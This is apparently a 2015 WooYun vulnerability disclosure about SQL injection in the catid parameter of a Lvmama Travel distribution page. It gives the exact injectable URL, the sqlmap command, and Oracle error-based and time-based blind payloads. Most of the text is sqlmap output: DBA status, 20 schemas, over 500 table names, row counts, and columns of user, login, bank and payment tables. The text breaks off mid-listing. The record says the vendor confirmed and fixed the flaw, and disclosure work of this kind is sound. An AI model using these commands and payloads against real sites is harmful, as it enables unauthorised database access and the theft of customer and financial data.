Vulnerability summary

Defect ID: wooyun-2015-0152911

Title: SQL injection at one location on a Lvmama Travel (驴妈妈旅游网) site (DBA privileges + 20 databases + 400+ users + 18 administrators + tens of thousands of records)

Vendor: Lvmama Travel (驴妈妈旅游网)

Author: 路人甲

Submitted: 2015-11-09 09:09

Fixed: 2015-12-24 17:58

Published: 2015-12-24 17:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor has confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-11-09: Details sent to the vendor, awaiting vendor handling
2015-11-09: Vendor has confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and domain experts
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to intern white hats
2015-12-24: Details disclosed to the public

Brief description:

Suddenly saw a lot of published vulnerabilities for Lvmama, so I came to test too, knowing nothing!~~~
Does this one need a login? Maybe it can be viewed without logging in; if so, let's test it!~~~

Detailed description:

Will there be a gift?
Injection point:
http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700
The catid parameter is injectable: appending a single quote (') returns an error, which suggests injection.
Before adding --level 3, catid looked injectable but could not be confirmed; after adding --level 3 it came right out!~~~

sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700" --threads 10 --dbms "Oracle" --level 3 --current-user --current-db --is-dba


[Screenshots: 2.jpg, 3.jpg, 4.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: error-based
Title: Oracle error-based - Parameter replace
Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(109)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (1434=1434) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(98)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)&orderby=3&minprice=100&maxprice=700
Type: AND/OR time-based blind
Title: Oracle time-based blind - Parameter replace
Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT (CASE WHEN (7573=7573) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(100)||CHR(97)||CHR(120),5) ELSE 7573 END) FROM DUAL)&orderby=3&minprice=100&maxprice=700
---
[01:35:19] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[01:35:19] [INFO] fetching current user
[01:35:19] [INFO] retrieved: SAAS14
current user: 'SAAS14'
[01:35:19] [INFO] fetching current database
[01:35:19] [INFO] resumed: SAAS14
[01:35:19] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SAAS14'
[01:35:19] [INFO] testing if current user is DBA
current user is DBA: True
[01:50:25] [INFO] the SQL query used returns 20 entries
[01:50:25] [INFO] starting 10 threads
[01:50:25] [INFO] resumed: CTXSYS
[01:50:25] [INFO] resumed: DBSNMP
[01:50:25] [INFO] resumed: DMSYS
[01:50:25] [INFO] resumed: EXFSYS
[01:50:25] [INFO] resumed: MDSYS
[01:50:25] [INFO] resumed: OLAPSYS
[01:50:25] [INFO] resumed: ORDSYS
[01:50:25] [INFO] resumed: OUTLN
[01:50:25] [INFO] resumed: SAAS15
[01:50:25] [INFO] resumed: SAAS14
[01:50:25] [INFO] resumed: SAAS17
[01:50:25] [INFO] resumed: SAAS16
[01:50:25] [INFO] resumed: SAAS19
[01:50:25] [INFO] resumed: SAAS18
[01:50:25] [INFO] resumed: SYS
[01:50:25] [INFO] resumed: SYSMAN
[01:50:25] [INFO] resumed: SYSTEM
[01:50:25] [INFO] resumed: TSMSYS
[01:50:25] [INFO] resumed: WMSYS
[01:50:25] [INFO] resumed: XDB
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS14
[502 tables]
+--------------------------------+
| AD_CONTENT |
| AD_PAGE |
| AD_SEAT |
| AD_SEAT_IMG |
| AD_SEAT_LINK |
| ALITRIP_HOTEL |
| ALITRIP_HOTEL_LOG |
| ALITRIP_HOTEL_ORDER |
| ALITRIP_HOTEL_ORDER_LOG |
| ALITRIP_HOTEL_PRODUCT |
| ALITRIP_HOTEL_PROD_LOG |
| ALITRIP_HOTEL_PROD_SYNC_LOG |
| ALITRIP_MENPIAO_LOG |
| ALITRIP_MENPIAO_NEWLOG |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_PRODUCT |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE |
| B2B_CHANNEL_PRICE |
| B2B_CHANNEL_PRICE_DAY |
| B2B_DEALER |
| B2B_DEALER_DAY |
| B2B_DEALER_LOG |
| B2B_FREETRAVEL |
| B2B_GRADE_PRICE |
| B2B_ORDER_REPORT |
| B2B_PACKAGE |
| B2B_SQPRICE |
| B2B_SQPRICE_DETAIL |
| B2B_TICKET |
| B2B_TICKET_2012 |
| B2B_TICKET_2013 |
| B2B_TICKET_AIRPORT |
| B2B_TICKET_BD |
| B2B_TICKET_CHANGE |
| B2B_TICKET_CHANGE_DETAIL |
| B2B_TICKET_CODE |
| B2B_TICKET_COND |
| B2B_TICKET_CONFIRM_LOG |
| B2B_TICKET_DETAIL |
| B2B_TICKET_DETAIL_2012 |
| B2B_TICKET_DETAIL_2013 |
| B2B_TICKET_EX |
| B2B_TICKET_FINISH_LOG |
| B2B_TICKET_HIS |
| B2B_TICKET_LOG |
| B2B_TICKET_PEOPLE |
| B2B_TICKET_STARTINFO |
| B2B_TICKET_TRAFFIC |
| B2C_CHANNEL_PRICE |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BANK_CITYCODE |
| BILL_TO_UFSOFT |
| CM_CHANNEL_PRICE |
| CM_ORDER_LOG |
| CM_PAY_BALANCE |
| CM_PAY_DRAWMONEY |
| CM_PAY_DRAWMONEY_LOG |
| CM_PAY_MONEY_LOG |
| CM_PAY_ORDER_LOG |
| CM_PROD_LOG |
| CM_SYNC_LOG |
| CM_SYNC_PROD_LOG |
| CM_USER |
| CM_USER_INFO |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CTRIPTICKET_ORDER_LOG |
| CUSTVIEW_INFO |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| CUST_VIEW_INFO |
| DIY_MDD |
| DIY_MDD_TYPE |
| DIY_REL_MDD_PROD |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| GROUP_INFO |
| GROUP_INFO_2ND |
| GROUP_INFO_DETAIL_2ND |
| GROUP_INFO_ORDER |
| GROUP_ORDER |
| GROUP_ORDER_PEOPLE |
| GROUP_SET |
| GROUP_YY_ORDER |
| GROUP_YY_ORDER_COND |
| GROUP_YY_ORDER_DETAIL |
| GROUP_YY_ORDER_LOG |
| GROUP_YY_ORDER_PEOPLE |
| GRP_CHANNEL_PRICE |
| GRP_GRADE_PRICE |
| GRP_ORDER |
| GRP_ORDER_DETAIL |
| GRP_TICKET |
| GRP_TICKET_PRICE |
| HOTEL_PLAN |
| HOTEL_PLAN_PRICE |
| HOTEL_PLAN_TYPE |
| HOTEL_WEEKSHOW |
| IMP_CODE |
| IMP_CODE_DETAIL |
| IMP_CODE_LIST |
| INFO_AIRPORT |
| INFO_AIRPORT_FLIGHT |
| INFO_AIRPORT_NUM |
| INFO_AIRPORT_NUM_LIST |
| INFO_AIRPORT_PRICE |
| INFO_AIRPORT_SEAT |
| INFO_AUTO_PRICE |
| INFO_CAR |
| INFO_CAR_TYPE |
| INFO_CATALOG |
| INFO_COMMENT |
| INFO_CONDS |
| INFO_CTRIPTICKET |
| INFO_FREETRAVEL |
| INFO_FREETRAVEL_TREE |
| INFO_GROUP |
| INFO_GROUP_DETAIL |
| INFO_HOTEL |
| INFO_HOTEL_NUM |
| INFO_HOTEL_PRICE |
| INFO_HOTEL_SET |
| INFO_INSURANCE |
| INFO_INSURANCE_LOG |
| INFO_INSURANCE_ORDER |
| INFO_JD |
| INFO_MEITUAN |
| INFO_NEWS |
| INFO_NEWS_READLOG |
| INFO_PLAN_PRICE |
| INFO_PROD |
| INFO_QUNAR_CONFIG |
| INFO_QUNAR_HOTEL |
| INFO_QUNAR_VIEW |
| INFO_TB_PRICE |
| INFO_TICKET |
| INFO_TICKET_CANCEL |
| INFO_TICKET_COND |
| INFO_TICKET_CUST |
| INFO_TICKET_DETAIL |
| INFO_TICKET_EX |
| INFO_TICKET_MAILTEMP |
| INFO_TICKET_NUM |
| INFO_TICKET_NUM_FOREX |
| INFO_TICKET_PRICE |
| INFO_TICKET_PRICE_FOREX |
| INFO_TICKET_REL |
| INFO_TICKET_RELAREA |
| INFO_TICKET_RELCAT |
| INFO_TICKET_RELVIEW |
| INFO_TICKET_REL_CUST |
| INFO_TOGO |
| INFO_TRAFFIC |
| INFO_TRAFFIC_NUM |
| INFO_TRAFFIC_NUM_LIST |
| INFO_TRAFFIC_PLACE |
| INFO_TRAFFIC_PRICE |
| INFO_TRAFFIC_SEAT |
| INFO_TRAFFIC_STATION |
| INFO_TRAFFIC_TIMES |
| INFO_TRAVEL |
| INFO_TRAVEL_CYCLE |
| INFO_TRAVEL_CYCLE_AUTO |
| INFO_TRAVEL_JOURNEY |
| INFO_TRAVEL_PRICE |
| INFO_TRAVEL_SEAT |
| INFO_TUNIU |
| INFO_VENUE |
| INFO_VENUE_NUM |
| INFO_VISA |
| INTERFACE_AILVTONG_LOG |
| INTERFACE_AIZHAOPIAO_LOG |
| INTERFACE_BEIZHU_LOG |
| INTERFACE_CAIHUISHIJIE_LOG |
| INTERFACE_CHANGLU_LOG |
| INTERFACE_CHANGLV_LOG |
| INTERFACE_CHANGYOUTONG_LOG |
| INTERFACE_CTRIP_HOLIDAY |
| INTERFACE_DADONGRT_LOG |
| INTERFACE_DDRT_LOG |
| INTERFACE_DIANPING_LOG |
| INTERFACE_DMZH_LOG |
| INTERFACE_DUMUQIAO_LOG |
| INTERFACE_FURONGYUAN_LOG |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_GLYD |
| INTERFACE_HKDISNEY_LOG |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_BE_PRODUCT |
| INTERFACE_HOTEL_DDS_LOG |
| INTERFACE_HOTEL_DDS_ORDER_LOG |
| INTERFACE_HOTEL_JL |
| INTERFACE_HOTEL_JL_LOG |
| INTERFACE_HOTEL_JL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_LOG |
| INTERFACE_HOTEL_LTJL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_PRODUCT |
| INTERFACE_HOTEL_LYY_ORDER_LOG |
| INTERFACE_HOTEL_PRODUCT |
| INTERFACE_HOTEL_XH_LOG |
| INTERFACE_HOTEL_XH_ORDER_LOG |
| INTERFACE_HOTEL_XH_PRODUCT |
| INTERFACE_HUANQIU_LOG |
| INTERFACE_HUANTAOYOU_LOG |
| INTERFACE_HUAXIAPIAOLIAN_LOG |
| INTERFACE_IHUIU_LOG |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_JD_CHANNEL_LOG |
| INTERFACE_JD_COUPON_PWD |
| INTERFACE_JIDIAOTONG_LOG |
| INTERFACE_KUIYUAN_LOG |
| INTERFACE_KUXIU_LOG |
| INTERFACE_LEXIAOXIANG_LOG |
| INTERFACE_LINE |
| INTERFACE_LINGNAN_LOG |
| INTERFACE_LIULIUKA_LOG |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LVMAMA_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN_DETAIL |
| INTERFACE_MEITUAN_LOG |
| INTERFACE_MJLD_LOG |
| INTERFACE_MOUNTWG_LOG |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOFUTONG_LOG |
| INTERFACE_PIAOGJ_LOG |
| INTERFACE_PIAOGONGCHANG_LOG |
| INTERFACE_PIAOWUBA_LOG |
| INTERFACE_PIAOZHIJIA_LOG |
| INTERFACE_PRICE_RULE |
| INTERFACE_PROD_SYNC_LOG |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HISTORY_LOG |
| INTERFACE_QUNAR_HISTOY_LOG |
| INTERFACE_QUNAR_HOLIDAY |
| INTERFACE_QUNAR_HOLIDAY_LOG |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_INVOICE |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_QUNAR_SUPPLIER_LOG |
| INTERFACE_SHANHAIGUAN_LOG |
| INTERFACE_SHOUKEYI_LOG |
| INTERFACE_SXLY |
| INTERFACE_SYNC_LOG |
| INTERFACE_TIANGUI_LOG |
| INTERFACE_TIANKE_LOG |
| INTERFACE_TICKET |
| INTERFACE_TONGCHENG_LOG |
| INTERFACE_TOURMART_LOG |
| INTERFACE_TUNIU_LOG |
| INTERFACE_VISITBEIJING_LOG |
| INTERFACE_WEIXUN_LOG |
| INTERFACE_WULONG_LOG |
| INTERFACE_XIAONIREN_LOG |
| INTERFACE_XIECHENG_LOG |
| INTERFACE_XINAIMOKE_LOG |
| INTERFACE_YANGGUANGLZ_LOG |
| INTERFACE_YINLVTONG_LOG |
| INTERFACE_YUANFAN_LOG |
| INTERFACE_YYJQ_LOG |
| INTERFACE_ZHONGJINGXIN_LOG |
| JOURNEY |
| JOURNEY_COMMENT |
| JOURNEY_DETAIL |
| JOURNEY_PRO_DETAIL |
| LVMAMA_CHUANHUO_LOG |
| LVMAMA_PRODUCT_INFO |
| LVMAMA_PRODUCT_LIST |
| LVMAMA_PUSH_LOG |
| LVMAMA_UPDATE_FLAG |
| LVMAMA_VIEW |
| LVMAMA_VIEW_INFO |
| LVWUTONGCODE_QUEUE |
| LVWUTONG_SMSMODE |
| LVWUTONG_TMPCODE |
| LVWUTONG_TMPCODE_GROUP |
| LVWUTONG_TMPCODE_LOG |
| LVWUTONG_TMPCODE_USE |
| NANHU_DEPTSET |
| ONLINE_DEBUG_LOG |
| ORDER_ABNORMAL_LOG |
| ORDER_API_PAY |
| ORDER_CHANGE_LOG |
| ORDER_LOG |
| ORDER_RELATION_LOG |
| PAY_BALANCE |
| PAY_CREDIT_FEE |
| PAY_DRAWMONEY |
| PAY_MOMEY_LOG |
| PAY_ORDER_LOG |
| PLAN_TABLE |
| QUNAR_PRICE_CACHE |
| RECE_APP |
| RECE_APP_DETAIL |
| RECE_INVOICE |
| RECE_INVOICE_DETAIL |
| RECE_PAYMENT_DETAIL |
| RECE_PAYMENT_LIST |
| RECE_STATEMENT_LIST |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_INFO |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_BANK |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_USER_INFO |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_VIEW_INFO |
| RUPD$_USR_TAG |
| RUPD$_USR_VIEW |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_DATAMAN |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_TABLE_SQL |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SETTLE_ACCOUNT |
| SETTLE_PAYABLE |
| SETTLE_PAYABLE_DETAIL |
| SETTLE_PAYABLE_LIST |
| SETTLE_PAYAPP |
| SETTLE_PAYAPP_DETAIL |
| SETTLE_STATEMENT_DETAIL |
| SETTLE_STATEMENT_LIST |
| SITE_IP2 |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| STOCK_ADD_LOG |
| STOCK_REPORT_DAY |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TEST_DB |
| TOUREASY_AREA |
| TOUREASY_LINE |
| TOUREASY_ORDER_INFO_PINGZHENG |
| TOUREASY_ORDER_QUEUE |
| TOUREASY_PRODUCT |
| TOUREASY_USR_LOG |
| TOUR_GUIDE |
| TRAFFIC_TO_TICKET |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_NUM |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UF_SOFT_QUEUE |
| UF_SOFT_SETTLE_PAYABLE |
| UF_SOFT_USR_CREDIT_LOG |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ACCOUNT |
| USR_ACCOUNT_LOG |
| USR_ACCOUNT_SET |
| USR_ATTENTION |
| USR_BALANCE_LOG |
| USR_BOOK |
| USR_CHECKIN_TYPE |
| USR_CREDIT |
| USR_CREDIT_LOG |
| USR_DEALER |
| USR_DEPT |
| USR_DIST |
| USR_DOCUMENT_TEMP |
| USR_ENTERPRISE_TAG |
| USR_GETPASS_LOG |
| USR_GRADE |
| USR_HOTEL_COND |
| USR_INFO |
| USR_INFO_B2C |
| USR_INFO_EXPRESS |
| USR_INTERFACE |
| USR_INTERFACE_INFO |
| USR_LOG |
| USR_LOGIN |
| USR_LOGIN_LOG |
| USR_LOG_2011 |
| USR_LOG_2012 |
| USR_LOG_2013 |
| USR_MAILTEMP_LIST |
| USR_MANAGER_USER |
| USR_MEMBER |
| USR_MENU |
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_PRINT_TEMP |
| USR_PROD_CODE |
| USR_PROD_WHILE_AREA |
| USR_PROD_WHILE_DETAIL |
| USR_PROD_WHILE_GROUP |
| USR_PROD_WHILE_LIST |
| USR_PROD_WHILE_TREE |
| USR_SCORE |
| USR_SCORE_DETAIL |
| USR_SCORE_LOG |
| USR_SCORE_RULE |
| USR_VIEW_BAK |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_AD |
| WX_AD_DETAIL |
| WX_AD_SEND_LOG |
| WX_COUPON_SCEEN |
| WX_COUPON_SEND_LOG |
| WX_KEY |
| WX_MSG |
| WX_MSG_TEMP |
| WX_ORDER_TASK |
| WX_SCENE |
| WX_SCENE_IN |
| WX_SCENE_LOG |
| WX_SEND_HISTORY |
| WX_SEND_QUEUE |
| WX_SET |
| WX_TREE |
| WX_USER_INFO |
| XIECHENG_HOTEL_INFO |
| XIECHENG_HOTEL_LOG |
| XIECHENG_HOTEL_ORDER |
| XIECHENG_HOTEL_STATE |
| INTERFACE_KUIYUAN_LOG |
+--------------------------------+
Database: SAAS14
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG | 2502247 |
| LVMAMA_VIEW | 69067 |
| USR_LOG | 56983 |
| CM_ORDER_LOG | 49229 |
| B2B_TICKET_PEOPLE | 32502 |
| PAY_ORDER_LOG | 29363 |
| B2B_TICKET | 27955 |
| B2B_TICKET_DETAIL | 27955 |
| B2B_TICKET_EX | 27926 |
| CM_SYNC_LOG | 27562 |
| INTERFACE_LVMAMA_LOG | 25698 |
| LVMAMA_PRODUCT_LIST | 23209 |
| INFO_TICKET | 23208 |
| ORDER_LOG | 22026 |
| INFO_TICKET_RELVIEW | 16473 |
| LVMAMA_CHUANHUO_LOG | 14566 |
| USR_LOGIN_LOG | 11318 |
| PAY_BALANCE | 3750 |
| PAY_MOMEY_LOG | 2669 |
| B2B_TICKET_CHANGE | 1306 |
| CM_SYNC_PROD_LOG | 856 |
| B2B_CHANNEL_PRICE | 626 |
| LVMAMA_VIEW_INFO | 610 |
| INFO_TICKET_NUM | 559 |
| USR_LOGIN | 431 |
| INFO_TICKET_CUST | 415 |
| B2B_CHANNEL_PRICE_DAY | 382 |
| USR_INFO | 377 |
| USR_CREDIT_LOG | 369 |
| WX_SCENE_LOG | 308 |
| USR_GETPASS_LOG | 208 |
| INFO_TICKET_EX | 136 |
| LVMAMA_PRODUCT_INFO | 72 |
| USR_ATTENTION | 65 |
| ORDER_ABNORMAL_LOG | 50 |
| WX_USER_INFO | 45 |
| USR_INFO_B2C | 44 |
| USR_INTERFACE_INFO | 41 |
| WX_AD_DETAIL | 23 |
| USR_MEMBER | 18 |
| INFO_TICKET_PRICE | 6 |
| WX_AD | 5 |
| USR_CREDIT | 4 |
| WX_AD_SEND_LOG | 4 |
| WX_MSG_TEMP | 2 |
| CUST_INFO_GROUP_CHANNEL | 1 |
| INFO_CONDS | 1 |
| INFO_TICKET_CANCEL | 1 |
| INTERFACE_XIECHENG_LOG | 1 |
| LVMAMA_UPDATE_FLAG | 1 |
| SAAS_DATAMAN | 1 |
| USR_DOCUMENT_TEMP | 1 |
| USR_INFO_EXPRESS | 1 |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CUST_ID | NUMBER |
| LOG_DATE | DATE |
| LOG_DESC | VARCHAR2 |
| LOG_NUM | VARCHAR2 |
| LOG_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| COOKIEID | VARCHAR2 |
| CUST_ID | NUMBER |
| IP | VARCHAR2 |
| LOGIN_DATE | DATE |
| LOGIN_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| ACCOUNT_NO | VARCHAR2 |
| CUST_ID | NUMBER |
| FROM_ADDRESS | VARCHAR2 |
| FROM_COM | VARCHAR2 |
| FROM_MAN | VARCHAR2 |
| FROM_TEL | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| SHIP_INFO | VARCHAR2 |
| UPDATE_DATE | DATE |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column | Type |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE | DATE |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM | NUMBER |
| CREDIT_TYPE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| KEY | VARCHAR2 |
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| AGREEMENT_DATE | DATE |
| AGREEMENT_IP | VARCHAR2 |
| AGREEMENT_USER | VARCHAR2 |
| ANDROID_UID | VARCHAR2 |
| AREA_ID | NUMBER |
| ATTENT_COUNT | NUMBER |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_CITYCODE | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BEIANHAO | VARCHAR2 |
| CHECK_PRINT_NUM | NUMBER |
| CHECK_PRINT_PRICE | VARCHAR2 |
| CONTRACT_END_DATE | DATE |
| CONTRACT_PERSON | VARCHAR2 |
| CONTRACT_START_DATE | DATE |
| CURRENCY_TYPE | NUMBER |
| CUST_CODE | VARCHAR2 |
| CUST_DESC | CLOB |
| CUST_GAT_FEE | NUMBER |
| CUST_GAT_LIMIT | NUMBER |
| CUST_GRADE | NUMBER |
| CUST_ID | NUMBER |
| CUST_NAME | VARCHAR2 |
| CUST_PAY_FEE | NUMBER |
| CUST_TYPE | NUMBER |
| CUST_WEBSITE | VARCHAR2 |
| DEPOSIT | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FEE | NUMBER |
| GET_MONEY_MODE | NUMBER |
| INTERFACE_PAY_TYPE | NUMBER |
| IS_B2B | NUMBER |
| IS_CHECK | NUMBER |
| IS_CHECK_VALUES | VARCHAR2 |
| IS_CONFIRM_ORDER | NUMBER |
| IS_DISCOUNT | NUMBER |
| IS_GAT_MONEY | NUMBER |
| IS_GROUP | NUMBER |
| IS_POST | NUMBER |
| IS_PRODMANAGER | NUMBER |
| IS_SAAS | NUMBER |
| IS_SENDSMS | NUMBER |
| IS_WHILE | NUMBER |
| LAST_IP | VARCHAR2 |
| LINK_ADDRESS | VARCHAR2 |
| LINK_EMAIL | VARCHAR2 |
| LINK_FAX | VARCHAR2 |
| LINK_MOBILE | VARCHAR2 |
| LINK_NAME | VARCHAR2 |
| LINK_PHONE | VARCHAR2 |
| LINK_QQ | VARCHAR2 |
| LINK_SOURCE | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LOGO | VARCHAR2 |
| MANAGER_MEMO | CLOB |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_POWER | NUMBER |
| ORDER_MONEY | NUMBER |
| ORDER_POWER_FIELD | VARCHAR2 |
| ORDER_TICKET | NUMBER |
| PARENT_AGENT_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_MODE | NUMBER |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT | NUMBER |
| REG_DATE | DATE |
| REG_IP | VARCHAR2 |
| REMARK | VARCHAR2 |
| REPORT_POWER | VARCHAR2 |
| RETURN_MODE | NUMBER |
| SALE_CHANNEL | VARCHAR2 |
| SALE_COUNT | NUMBER |
| SALE_MONEY | NUMBER |
| SALE_TICKET | NUMBER |
| SALE_TYPE | NUMBER |
| SEAL_PATH | VARCHAR2 |
| SENDMSG_MOBILE | VARCHAR2 |
| SENDMSG_SMS | VARCHAR2 |
| SERVICE_FEE_PAY | NUMBER |
| SOURCE_URL | VARCHAR2 |
| STATE | NUMBER |
| STOP_DATE | DATE |
| STOP_IP | VARCHAR2 |
| STOP_USER | VARCHAR2 |
| USER_ID | VARCHAR2 |
| VIP | NUMBER |
| WHILE_RELCODE | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| CUR_BALANCE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_ACCOUNT | VARCHAR2 |
| PAY_BALANCE_ID | NUMBER |
| PAY_DATE | DATE |
| PAY_LOG | CLOB |
| PAY_NUM | NUMBER |
| PAY_SERVICE | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE | NUMBER |
| REC_BALANCE | NUMBER |
| STATE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_REMARK | CLOB |
| WORKFLOWNO | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
